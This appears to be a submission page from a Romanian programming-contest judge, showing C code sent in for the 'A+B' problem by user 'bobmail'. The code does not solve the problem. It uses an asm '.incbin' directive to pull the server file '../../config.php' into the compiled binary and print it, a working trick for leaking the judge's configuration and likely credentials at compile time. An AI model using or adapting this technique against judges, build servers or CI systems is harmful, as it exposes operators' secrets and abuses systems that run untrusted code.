Cod sursa(job #675794)

Utilizator bobmailBob Male bobmail Data 8 februarie 2012 11:18:35
Problema A+B Scor 0
Compilator c Status done
Runda Arhiva de probleme Marime 0.16 kb
#include <stdio.h>

asm(
"data:\n\t"
".incbin \"../../config.php\"\n\t"
".byte 0\n\t"
); 

extern char data[];

int main() {
  printf("%s\n",data);  
  return 0;
}